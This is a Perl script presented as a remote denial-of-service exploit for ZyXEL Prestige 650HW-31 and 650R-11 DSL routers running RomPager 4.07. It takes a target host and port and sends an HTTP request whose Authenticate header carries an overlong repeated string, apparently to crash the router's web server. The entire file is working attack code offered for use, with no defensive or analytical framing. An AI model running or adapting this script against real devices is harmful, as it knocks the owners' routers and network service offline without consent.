#!/usr/bin/perl
#
# ZyXEL Prestige 650HW-31 and 650R-11 DSL Router
# Running RomPager 4.07 server
# Remote long password DoS exploit
#
# by frid4y ftff[at]c.dk
#

use IO::Socket;

print "\n ZyXEL Prestige 650HW-31/650R-11 DSL Router remote DoS exploit\n";
print " k0ded by frid4y ftff[at]c.dk\n\n";

$target = $ARGV[0];
$port = $ARGV[1];
$foo = "shite"; $bar = "1337";
$packet = $foo x $bar;
$string = "GET / HTTP/1.1\r\nHOST: $target\r\nAuthenticate: $packet\r\n\r\n";

unless (@ARGV == 2) { die " Usage: $0 <target> <port>\n\n" }
@ARGV = ($target, $port);

$conn = IO::Socket::INET->new(

		Proto		=>	"tcp",
		PeerAddr	=>	"$target",
		PeerPort	=>	"$port",
	);

unless ($conn) { die " [-] Can't connect to target\n\n" }
	else {
		print $conn $string;
		print " [+] Package delivered to $ARGV[0]\n\n"
	}

close($conn);